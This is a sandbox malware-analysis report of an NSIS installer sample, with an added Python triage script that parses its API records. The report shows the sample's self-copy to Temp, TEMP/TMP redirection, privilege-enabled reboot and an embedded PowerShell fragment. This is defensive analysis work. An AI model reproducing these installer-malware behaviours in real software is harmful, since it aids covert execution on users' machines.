402345 4069->4073 4070->4073 4072 402386 SHFileOperationA 4071->4072 4072->4069 4072->4073 4074 404498 4076 4045ba 4074->4076 4077 4044ae 4074->4077 4075 404629 4078 4046f3 4075->4078 4080 404633 GetDlgItem 4075->4080 4076->4075 4076->4078 4084 4045fe GetDlgItem SendMessageA 4076->4084 4079 40432d 22 API calls 4077->4079 4086 404394 8 API calls 4078->4086 4081 404504 4079->4081 4082 4046b1 4080->4082 4083 404649 4080->4083 4085 40432d 22 API calls 4081->4085 4082->4078 4087 4046c3 4082->4087 4083->4082 4091 40466f SendMessageA LoadCursorA SetCursor 4083->4091 4107 40434f KiUserCallbackDispatcher 4084->4107 4089 404511 CheckDlgButton 4085->4089 4090 4046ee 4086->4090 4092 4046c9 SendMessageA 4087->4092 4093 4046da 4087->4093 4105 40434f 
KiUserCallbackDispatcher 4089->4105 4111 40473c 4091->4111 4092->4093 4093->4090 4097 4046e0 SendMessageA 4093->4097 4094 404624 4108 404718 4094->4108 4097->4090 4099 40452f GetDlgItem 4106 404362 SendMessageA 4099->4106 4102 404545 SendMessageA 4103 404563 GetSysColor 4102->4103 4104 40456c SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4102->4104 4103->4104 4104->4090 4105->4099 4106->4102 4107->4094 4109 404726 4108->4109 4110 40472b SendMessageA 4108->4110 4109->4110 4110->4075 4114 405969 ShellExecuteExA 4111->4114 4113 4046a2 LoadCursorA SetCursor 4113->4082 4114->4113 4115 402198 4116 402c5e 21 API calls 4115->4116 4117 40219f 4116->4117 4118 402c5e 21 API calls 4117->4118 4119 4021a9 4118->4119 4120 402c5e 21 API calls 4119->4120 4121 4021b3 4120->4121 4122 402c5e 21 API calls 4121->4122 4123 4021c0 4122->4123 4124 402c5e 21 API calls 4123->4124 4125 4021ca 4124->4125 4126 40220c CoCreateInstance 4125->4126 4127 402c5e 21 API calls 4125->4127 4130 40222b 4126->4130 4132 4022d9 4126->4132 4127->4126 4128 401423 28 API calls 4129 40230f 4128->4129 4131 4022b9 MultiByteToWideChar 4130->4131 4130->4132 4131->4132 4132->4128 4132->4129 4133 40239a 4134 4023a1 4133->4134 4137 4023b4 4133->4137 4135 406320 21 API calls 4134->4135 4136 4023ae 4135->4136 4138 4059a3 MessageBoxIndirectA 4136->4138 4138->4137 4139 40269a 4140 402c3c 21 API calls 4139->4140 4145 4026a4 4140->4145 4141 402712 4142 405e98 ReadFile 4142->4145 4143 402714 4148 4061eb wsprintfA 4143->4148 4144 402724 4144->4141 4147 40273a SetFilePointer 4144->4147 4145->4141 4145->4142 4145->4143 4145->4144 4147->4141 4148->4141 4149 402a1b 4150 402a22 4149->4150 4151 402a6e 4149->4151 4153 402c3c 21 API calls 4150->4153 4156 402a6c 4150->4156 4152 4066b5 5 API calls 4151->4152 4154 402a75 4152->4154 4155 402a30 4153->4155 4157 402c5e 21 API calls 4154->4157 4158 402c3c 21 API calls 4155->4158 4159 402a7e 4157->4159 4161 402a3f 4158->4161 4159->4156 4167 4062e0 4159->4167 4166 4061eb 
                                [Remainder of the Joe Sandbox IDA-plugin control-flow graph (node/edge list of the interactive graph widget) omitted. API-bearing nodes in this part of the graph: 0x405926 CreateProcessA with 0x405959 CloseHandle, 0x40672a WaitForSingleObject, 0x406756 GetExitCodeProcess and a PeekMessageA/DispatchMessageA message pump at 0x40670e (child-process launch and wait); 0x405969 ShellExecuteExA; 0x40615b RegCreateKeyExA, 0x402522 RegSetValueExA, 0x4025e3 RegEnumKeyA, 0x4025ef RegEnumValueA, 0x40260b RegCloseKey; 0x405e20 GetFileAttributesA/CreateFileA, 0x405e98 and 0x40337a ReadFile, 0x405ec7 WriteFile, 0x403390 SetFilePointer, 0x4027af FindNextFileA; 0x4059a3 MessageBoxIndirectA, 0x4014ab PostQuitMessage, 0x401d29 IsWindow; 0x40630e IIDFromString, 0x4062af WideCharToMultiByte, 0x402aad CoTaskMemFree; installer dialog handlers at 0x404d32 (GetDlgItem/SendMessageA/ImageList_Destroy), 0x403e33 (ShowWindow/DestroyWindow/CreateDialogParamA/GetSystemMenu/EnableMenuItem) and 0x4047bf (GetDlgItemTextA/SHBrowseForFolderA/GetDiskFreeSpaceA/SetDlgItemTextA); 0x403a14 FreeLibrary/GlobalFree.]

                                Control-flow Graph (function 0x4033d8-0x4039b6, installer entry: version check, Temp-directory setup, self-copy, reboot handling; basic-block/edge list of the interactive graph omitted)
                                APIs
                                • SetErrorMode.KERNELBASE(00008001), ref: 004033FB (0x8001 = SEM_FAILCRITICALERRORS | SEM_NOOPENFILEERRORBOX: suppresses the error dialogs that would stall an unattended run)
                                • GetVersionExA.KERNEL32(?), ref: 00403424
                                • GetVersionExA.KERNEL32(0000009C), ref: 0040343B
                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403504
                                • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403541 (COMCTL32 ordinal 17 = InitCommonControls)
                                • OleInitialize.OLE32(00000000), ref: 00403548
                                • SHGetFileInfoA.SHELL32(00429448,00000000,?,00000160,00000000,?,00000008,0000000A,0000000C), ref: 00403566
                                • GetCommandLineA.KERNEL32(Ifrende Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040357B
                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\MPkM9Dd99B.exe",00000020,"C:\Users\user\Desktop\MPkM9Dd99B.exe",00000000,?,00000008,0000000A,0000000C), ref: 004035B5
                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000008,0000000A,0000000C), ref: 004036AE
                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 004036BF
                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036CB
                                • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036DF
                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036E7
                                • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036F8
                                • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 00403700
                                • DeleteFileA.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 00403714
                                • ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C), ref: 004037BA
                                • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C), ref: 004037BF
                                • ExitProcess.KERNEL32 ref: 004037E0
                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe",00000000,?,?,00000008,0000000A,0000000C), ref: 004037EF
                                • wsprintfA.USER32 ref: 00403846
                                • GetFileAttributesA.KERNEL32(Bje gka",C:\Users\user\AppData\Local\Temp\,Bje gka",?,0000000C), ref: 00403878
                                • DeleteFileA.KERNEL32(Bje gka"), ref: 00403884
                                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Bje gka",?,0000000C), ref: 004038B0
                                • CopyFileA.KERNEL32(C:\Users\user\Desktop\MPkM9Dd99B.exe,Bje gka",00000001), ref: 004038C6
                                • CloseHandle.KERNEL32(00000000,"$Beseen=gc -raw ',"$Beseen=gc -raw ',?,Bje gka",00000000), ref: 00403919 (the string "$Beseen=gc -raw ' is a PowerShell fragment: gc is the Get-Content alias and -Raw reads a file as one string)
                                • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403936
                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040393D
                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403951
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403970
                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403995 (uFlags 0x2 = EWX_REBOOT; dwReason 0x80040002 = SHTDN_REASON_FLAG_PLANNED | SHTDN_REASON_MAJOR_APPLICATION | SHTDN_REASON_MINOR_INSTALLATION)
                                • ExitProcess.KERNEL32 ref: 004039B6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: FileProcess$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                                • String ID: "$"$Beseen=gc -raw '$"C:\Users\user\Desktop\MPkM9Dd99B.exe"$1033$A$Bje gka"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth$C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Forsmgtede$C:\Users\user\Desktop$C:\Users\user\Desktop\MPkM9Dd99B.exe$Error launching installer$Ifrende Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$Under i$$\Temp$`KXu$~nsu%X.tmp
                                • API String ID: 3308099279-3817090802
                                • Opcode ID: 421d5eb472970c8e9273ab7cabbfa33fc046e403f42b0bf6beeb9477a4c27e51
                                • Instruction ID: 7f7404e7af7d96985e5cf9c88e74da5f08b6bc5144b1890d42f960bb7a69135c
                                • Opcode Fuzzy Hash: 421d5eb472970c8e9273ab7cabbfa33fc046e403f42b0bf6beeb9477a4c27e51
                                • Instruction Fuzzy Hash: E2F11570904254AADB21AF758D49BAF7EB8AF45706F0440BFF441B62D2CB7C4A45CB2E

                                Control-flow Graph (function 0x40550f, installer details/log pane handler: list-view setup, worker thread started at Function_000054A3, context menu that copies the log to the clipboard; basic-block/edge list of the interactive graph omitted)
                                APIs
                                • GetDlgItem.USER32(?,00000403), ref: 0040556E
                                • GetDlgItem.USER32(?,000003EE), ref: 0040557D
                                • GetClientRect.USER32(?,?), ref: 004055BA
                                • GetSystemMetrics.USER32(00000002), ref: 004055C1
                                • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004055E2
                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004055F3
                                • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405606
                                • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405614
                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405627
                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405649
                                • ShowWindow.USER32(?,00000008), ref: 0040565D
                                • GetDlgItem.USER32(?,000003EC), ref: 0040567E
                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040568E
                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004056A7
                                • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004056B3
                                • GetDlgItem.USER32(?,000003F8), ref: 0040558C
                                  • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                • GetDlgItem.USER32(?,000003EC), ref: 004056CF
                                • CreateThread.KERNELBASE(00000000,00000000,Function_000054A3,00000000), ref: 004056DD
                                • CloseHandle.KERNELBASE(00000000), ref: 004056E4
                                • ShowWindow.USER32(00000000), ref: 00405707
                                • ShowWindow.USER32(?,00000008), ref: 0040570E
                                • ShowWindow.USER32(00000008), ref: 00405754
                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405788
                                • CreatePopupMenu.USER32 ref: 00405799
                                • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004057AE
                                • GetWindowRect.USER32(?,000000FF), ref: 004057CE
                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004057E7
                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405823
                                • OpenClipboard.USER32(00000000), ref: 00405833
                                • EmptyClipboard.USER32 ref: 00405839
                                • GlobalAlloc.KERNEL32(00000042,?), ref: 00405842
                                • GlobalLock.KERNEL32(00000000), ref: 0040584C
                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405860
                                • GlobalUnlock.KERNEL32(00000000), ref: 00405879
                                • SetClipboardData.USER32(00000001,00000000), ref: 00405884
                                • CloseClipboard.USER32 ref: 0040588A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                • String ID:
                                • API String ID: 590372296-0
                                • Opcode ID: ab14618a2fdcd9c268bec1058c916e7d70e9859125749bfc909000d0c8dffae2
                                • Instruction ID: 4cf6c47baa67300a2587cb91bb909ead9d18e5d8973f7e879562a42f7fe873d6
                                • Opcode Fuzzy Hash: ab14618a2fdcd9c268bec1058c916e7d70e9859125749bfc909000d0c8dffae2
                                • Instruction Fuzzy Hash: 58A16A71A00609FFDB11AFA0DE89EAE7BB9EB44354F40403AFA44B61A0C7754D51DF68

                                Control-flow Graph (function 0x405a4f, recursive directory cleanup via FindFirstFileA/FindNextFileA/DeleteFileA, calling itself for subdirectories, here applied to the installer's Temp plugin directory; basic-block/edge list of the interactive graph omitted)
                                APIs
                                • DeleteFileA.KERNELBASE(?,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe"), ref: 00405A78
                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz930C.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsz930C.tmp\*.*,?,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe"), ref: 00405AC0
                                • lstrcatA.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsz930C.tmp\*.*,?,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe"), ref: 00405AE1
                                • lstrlenA.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsz930C.tmp\*.*,?,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe"), ref: 00405AE7
                                • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsz930C.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsz930C.tmp\*.*,?,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe"), ref: 00405AF8
                                • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405BA5
                                • FindClose.KERNEL32(00000000), ref: 00405BB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                • String ID: "C:\Users\user\Desktop\MPkM9Dd99B.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsz930C.tmp\*.*$\*.*
                                • API String ID: 2035342205-1670686335
                                • Opcode ID: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
                                • Instruction ID: da8d20c05f1c1589987c6f576fa29bd8846dab181693994c0c241c39a5f8a394
                                • Opcode Fuzzy Hash: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
                                • Instruction Fuzzy Hash: 3051C030904A04BADB21AB618C85FAF7AB8EF42754F14417FF445B11D2C77C6982DEAE
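The "APIs" listings above are the raw per-function call records the Joe Sandbox IDA plugin emits, and the behaviours that matter for triage (TEMP/TMP redirection, the installer copying itself into Temp, the embedded PowerShell fragment, the SeShutdownPrivilege plus ExitWindowsEx reboot path, the Temp plugin-directory enumeration) are spread across them. The following Python script is an added example, not part of the report or of Joe Sandbox: it parses that "• Api.Module(args), ref: addr" line format and turns it into behaviour tags. SAMPLE is a constructed excerpt copied from the listings for 0x4033d8 and 0x405a4f above; the tag names and the `sample_name` parameter are my own conventions.

```python
import re
from collections import Counter

# Constructed input: ten lines copied from the "APIs" listings above for the
# installer entry function (0x4033d8) and the Temp cleanup function (0x405a4f).
SAMPLE = r"""
• SetErrorMode.KERNELBASE(00008001), ref: 004033FB
• GetCommandLineA.KERNEL32(Ifrende Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040357B
• SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036F8
• SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 00403700
• CopyFileA.KERNEL32(C:\Users\user\Desktop\MPkM9Dd99B.exe,Bje gka",00000001), ref: 004038C6
• CloseHandle.KERNEL32(00000000,"$Beseen=gc -raw ',"$Beseen=gc -raw ',?,Bje gka",00000000), ref: 00403919
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403951
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403970
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403995
• FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsz930C.tmp\*.*,?,?,?,0040A014), ref: 00405AF8
"""

# One record per "• Api.Module(args), ref: addr" line; everything else is ignored.
API_LINE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")

# ExitWindowsEx flag and reason bits (winuser.h / reason.h).
EWX_SHUTDOWN = 0x1
EWX_REBOOT = 0x2
SHTDN_REASON_FLAG_PLANNED = 0x80000000


def parse_api_lines(text):
    """Return a list of dicts (api, module, ref, args, strings) for every API line in text."""
    records = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        # The plugin does not quote arguments, so a comma inside a string argument
        # splits it; acceptable for indicator extraction.
        args = [a.strip() for a in raw.split(",")] if raw else []
        records.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "ref": int(m.group("ref"), 16),
            "args": args,
            # Anything that is neither an 8-digit hex value nor the plugin's '?'
            # placeholder is a string the function was called with.
            "strings": [a for a in args if a and a != "?" and not HEX32.match(a)],
        })
    return records


def module_counts(records):
    """Number of recorded calls landing in each DLL."""
    return Counter(r["module"] for r in records)


def triage(records, sample_name):
    """Derive behaviour tags from the recorded calls; sample_name is the analysed file's name."""
    tags = set()
    for r in records:
        api, args, strings = r["api"], r["args"], r["strings"]
        if api == "SetEnvironmentVariableA" and strings and strings[0] in ("TEMP", "TMP"):
            tags.add("env-redirect:" + strings[0])
        if api == "CopyFileA" and len(strings) >= 2 and strings[0].endswith(sample_name):
            tags.add("copy-self-to:" + strings[1])
        if api == "LookupPrivilegeValueA" and "SeShutdownPrivilege" in strings:
            tags.add("privilege:SeShutdownPrivilege")
        if api == "ExitWindowsEx" and len(args) >= 2:
            flags, reason = int(args[0], 16), int(args[1], 16)
            mode = "reboot" if flags & EWX_REBOOT else "shutdown" if flags & EWX_SHUTDOWN else "logoff"
            tags.add("exitwindows:" + mode)
            if reason & SHTDN_REASON_FLAG_PLANNED:
                tags.add("exitwindows:planned")
        # 'gc' is the PowerShell alias for Get-Content; a PowerShell fragment among an
        # installer's string arguments points at a script it assembles at runtime.
        if any("gc -raw" in s for s in strings):
            tags.add("powershell-fragment:gc -raw")
        if api == "FindFirstFileA" and strings and strings[0].endswith(r"\*.*"):
            tags.add("enumerate-dir:" + strings[0][: -len(r"\*.*")])
    return tags


if __name__ == "__main__":
    recs = parse_api_lines(SAMPLE)
    print(dict(module_counts(recs)))
    for tag in sorted(triage(recs, "MPkM9Dd99B.exe")):
        print(tag)
```

Run against a full report, the same parser can be fed every "APIs" block in turn and the tags keyed by the function's start address; the rules here are deliberately narrow to the calls this sample makes, so extend `triage` rather than loosening the string heuristics.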
                                APIs
                                • FindFirstFileA.KERNELBASE(75573410,0042BCD8,C:\,00405D50,C:\,C:\,00000000,C:\,C:\,75573410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,75573410,C:\Users\user\AppData\Local\Temp\), ref: 0040662B
                                • FindClose.KERNEL32(00000000), ref: 00406637
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Find$CloseFileFirst
                                • String ID: C:\
                                • API String ID: 2295610775-3404278061
                                • Opcode ID: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
                                • Instruction ID: 21071efbed15a2f64541de492f8ee2fd881da0b051754d52d90be6cd238fbd17
                                • Opcode Fuzzy Hash: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
                                • Instruction Fuzzy Hash: 08D012355490205BC64017396F0C85BBA599F163717118E37F8A6F12E0CB758C7296DC

                                 Control-flow Graph (function starting at 403e33; rendered graph not reproduced in text)
                                APIs
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E6F
                                • ShowWindow.USER32(?), ref: 00403E8F
                                • GetWindowLongA.USER32(?,000000F0), ref: 00403EA1
                                • ShowWindow.USER32(?,00000004), ref: 00403EBA
                                • DestroyWindow.USER32 ref: 00403ECE
                                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403EE7
                                • GetDlgItem.USER32(?,?), ref: 00403F06
                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403F1A
                                • IsWindowEnabled.USER32(00000000), ref: 00403F21
                                • GetDlgItem.USER32(?,00000001), ref: 00403FCC
                                • GetDlgItem.USER32(?,00000002), ref: 00403FD6
                                • SetClassLongA.USER32(?,000000F2,?), ref: 00403FF0
                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00404041
                                • GetDlgItem.USER32(?,00000003), ref: 004040E7
                                • ShowWindow.USER32(00000000,?), ref: 00404108
                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040411A
                                • EnableWindow.USER32(?,?), ref: 00404135
                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414B
                                • EnableMenuItem.USER32(00000000), ref: 00404152
                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040416A
                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040417D
                                • lstrlenA.KERNEL32(0042A488,?,0042A488,00000000), ref: 004041A7
                                • SetWindowTextA.USER32(?,0042A488), ref: 004041B6
                                • ShowWindow.USER32(?,0000000A), ref: 004042EA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                • String ID:
                                • API String ID: 121052019-0
                                • Opcode ID: 839e81d427f6c58c85d128010f5d9028c8a9196b72fb1deba7765417e8979c48
                                • Instruction ID: 7c61018aff81ba8050a36ffdf8d01ac8e149416bf37329b2a87c27abd1a4edd3
                                • Opcode Fuzzy Hash: 839e81d427f6c58c85d128010f5d9028c8a9196b72fb1deba7765417e8979c48
                                • Instruction Fuzzy Hash: 60C1F4B1600205ABD7206F61EE49E2B3BBCEB85749F51053EF681B11F1CB799842DB2D

                                 Control-flow Graph (function starting at 403a96; rendered graph not reproduced in text)
                                APIs
                                  • Part of subcall function 004066B5: GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                                  • Part of subcall function 004066B5: GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                • lstrcatA.KERNEL32(1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,75573410,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\MPkM9Dd99B.exe",0000000A,0000000C), ref: 00403B11
                                • lstrlenA.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth,1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,75573410), ref: 00403B86
                                • lstrcmpiA.KERNEL32(?,.exe), ref: 00403B99
                                • GetFileAttributesA.KERNEL32(Remove folder: ,?,"C:\Users\user\Desktop\MPkM9Dd99B.exe",0000000A,0000000C), ref: 00403BA4
                                • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth), ref: 00403BED
                                  • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                • RegisterClassA.USER32(0042E7C0), ref: 00403C2A
                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C42
                                • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C77
                                • ShowWindow.USER32(00000005,00000000,?,"C:\Users\user\Desktop\MPkM9Dd99B.exe",0000000A,0000000C), ref: 00403CAD
                                • GetClassInfoA.USER32(00000000,RichEdit20A,0042E7C0), ref: 00403CD9
                                • GetClassInfoA.USER32(00000000,RichEdit,0042E7C0), ref: 00403CE6
                                • RegisterClassA.USER32(0042E7C0), ref: 00403CEF
                                • DialogBoxParamA.USER32(?,00000000,00403E33,00000000), ref: 00403D0E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
